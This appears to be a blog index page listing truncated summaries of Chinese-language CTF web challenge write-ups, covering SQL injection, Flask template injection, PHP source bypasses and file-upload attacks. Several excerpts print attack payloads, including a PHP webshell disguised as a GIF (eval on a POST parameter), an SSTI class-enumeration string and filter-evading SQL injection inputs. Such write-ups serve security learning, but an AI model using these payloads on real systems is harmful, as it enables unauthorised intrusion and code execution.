fishjumpriver

摘要： Less17基于报错的字符型注入 打开环境是一个密码重置页面 在用户名栏输入各种语句都无效，遂审计源码 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($ 阅读全文

摘要： Less11基于post提交的单引号闭合的字符型注入 一、手工注入 1.判断注入点 判断注入类型是否为数字型 1 or 1=1 1 or 1=2 发现页面显示相同，因此不是数字型 判断注入类型是否为字符型 1' or 1=1# 1' or 1=2# 发现1=2页面异常报错，1=1正常。所以是单引号字 阅读全文

摘要： [WUSTCTF2020]CV Maker 打开环境 注册了账号登陆，发现有上传头像的地方，尝试上传文件 可以上传图片马 GIF89a <script language='php'> @eval($_POST['shell']);</script> BP里抓包改为php，得到上传成功路径http:/ 阅读全文

摘要： [CSCCTF 2019 Qual]FlaskLight 打开环境 源代码里发现可通过GET方式传入参数 简单验证发现存在SSTI {{''.__class__.__mro__[2].__subclasses__()}} #可以爆出所有的类 编写脚本查找可利用的类 利用subprocess.Pope 阅读全文

摘要： [Zer0pts2020]Can you guess it? 打开环境没有什么特殊的地方，可以点击按钮查看源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/ 阅读全文

摘要： [MRCTF2020]套娃 打开环境发现有张图片显示不出来 查看网页源代码发现部分代码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 阅读全文

摘要： [WUSTCTF2020]颜值成绩查询 打开环境是一个成绩查询的页面 1.手工注入 输入1发现有admin的账号和得分 输入1'会提示学号不存在 1/**/or/**/1=1# 过滤了空格 1/**/order/**/by/**/3# 存在 1/**/order/**/by/**/4# 不存在 由此 阅读全文

摘要： [FBCTF2019]RCEService 打开环境，提示输入JSON格式 输入 {"cmd":"ls"}，只有一个index,php，而且不能读取 到这卡住了，找了师傅们的WP发现源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_ 阅读全文

摘要： [GYCTF2020]FlaskApp 打开环境是一个base64编解码的网站 提示里是一张图片 源码提示PIN 尝试输入错误字符看看页面结果，于是在解码页面输入123 有源码泄露 @app.route('/decode',methods=['POST','GET']) def decode(): 阅读全文

摘要： [SUCTF 2019]Pythonginx 打开环境 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).host 阅读全文